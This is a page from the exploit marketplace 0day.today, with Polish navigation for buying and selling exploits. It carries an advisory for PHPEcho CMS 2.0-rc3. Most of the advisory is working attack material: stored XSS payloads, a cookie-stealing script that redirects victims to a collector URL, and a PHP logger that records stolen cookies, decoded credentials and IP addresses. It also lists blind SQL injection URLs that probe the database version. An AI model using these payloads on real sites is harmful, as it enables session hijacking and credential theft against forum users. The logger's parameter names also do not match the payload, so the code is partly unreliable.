0day.today - Największa Baza Exploitów na Świecie.
![](/img/logo_green.jpg)
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyćGOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability
Autor
Ryzyko
![](/img/risk/critlow_0.gif)
Nieskategoryzowane Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
Platforma
===================================================================== PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability ===================================================================== PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability bug found by Jose Luis Gongora Fernandez (a.k.a) JosS - download: http://sourceforge.net/project/showfiles.php?group_id=186100 ~ [XSS] The forum allowed insert javascript code and html code. PoC: "><h1>0wned</h1> "><script>alert("JosS b0x");</script> ----------- Cookie Stealing: <script>window.location=?http://127.0.0.1/stealing.php?cookie=?+document.cookie</script> stealing.php <?php $archivo = fopen('log.htm','a'); $cookie = $_GET['c']; $usuario = $_GET['id']; $ip = getenv ('REMOTE_ADDR'); $re = $HTTPREFERRER; $fecha=date("j F, Y, g:i a"); fwrite($archivo, '<hr>USER and PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> IP: ' .$ip. '<br> Date and Time: ' .$fecha. '</hr>'); fclose($archivo); ?> ~ [BLIND] PoC: /index.php?module=forum&show=thread&id=1 and 1=2 [False] /index.php?module=forum&show=thread&id=1 and 1=1 [True] /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5 /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4 # 0day.today [2024-07-04] #